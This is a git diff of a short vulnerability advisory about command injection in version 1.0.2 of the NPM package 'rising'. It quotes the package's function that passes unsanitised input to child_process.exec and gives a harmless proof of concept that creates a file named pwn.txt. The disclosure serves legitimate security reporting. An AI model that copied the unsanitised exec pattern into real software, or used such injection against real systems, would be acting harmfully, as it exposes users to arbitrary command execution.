Splint3r7 · November 11, 2023 14:16 · Nov 11, 2023 · Nov 11, 2023
diff --git a/rising-1.0.2-command-injection.md b/rising-1.0.2-command-injection.md
@@ -1,6 +1,6 @@
 # Command Injection Vulnerability in Rising 1.0.2
 
-Command injection vulnerability was indented in NPM package rising version 1.0.2
+Command injection vulnerability was identified in NPM package rising version 1.0.2
 
 Resources:
 

diff --git a/rising-1.0.2-command-injection.md b/rising-1.0.2-command-injection.md
@@ -0,0 +1,45 @@
+# Command Injection Vulnerability in Rising 1.0.2
+
+Command injection vulnerability was indented in NPM package rising version 1.0.2
+
+Resources:
+
+* Project's NPM Package: https://www.npmjs.com/package/rising
+* Project's NPM JS registery: https://registry.npmjs.org/rising
+
+## Code Analysis Background
+
+`child_process` has been utilized in the plugin to execute the command. A user input has been used which is not being sanitized, which allows an attacker to perform command injection through rising package.
+
+below is the code snippet that executes command without sanitizing it.
+
+```
+const child_process = require('child_process')
+// other code
+/**
+ * Execute a (shell) command.
+ * 
+ * @param String cmd Your command.
+ */ 
+function execute(cmd) {
+    child_process.exec(cmd)
+}
+```
+
+## Exploitation:
+
+POC:
+
+```
+const rising = require('./index.js'); 
+
+rising.println('Hello, world!');
+rising.execute('touch pwn.txt');
+
+```
+
+Observer a new file pwn.txt will be created in the same directory.
+
+# Author
+
+Hassan Khan Yusufzai